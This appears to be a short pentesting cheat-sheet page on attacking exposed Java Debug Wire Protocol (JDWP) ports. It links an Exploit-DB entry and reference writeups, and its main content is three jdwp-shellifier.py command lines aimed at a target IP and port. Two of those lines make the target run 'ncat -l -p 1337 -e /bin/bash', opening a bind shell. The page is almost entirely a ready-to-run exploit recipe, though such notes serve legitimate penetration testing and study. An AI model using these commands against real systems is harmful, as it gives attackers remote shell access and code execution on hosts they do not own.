# JDWP

{% embed url="<https://www.exploit-db.com/exploits/46501>" %}

```
./jdwp-shellifier.py -t 192.168.2.9 -p 8000 #Obtain internal data
./jdwp-shellifier.py -t 192.168.2.9 -p 8000 --cmd 'ncat -l -p 1337 -e /bin/bash' #Exec something
./jdwp-shellifier.py -t 192.168.2.9 -p 8000 --break-on 'java.lang.String.indexOf' --cmd 'ncat -l -p 1337 -e /bin/bash' #Uses java.lang.String.indexOf as breakpoint instead of java.net.ServerSocket.accept
```

#### <mark style="color:purple;">**Resources:**</mark>

{% embed url="<https://book.hacktricks.xyz/network-services-pentesting/pentesting-jdwp-java-debug-wire-protocol>" %}

{% embed url="<https://ioactive.com/hacking-java-debug-wire-protocol-or-how/>" %}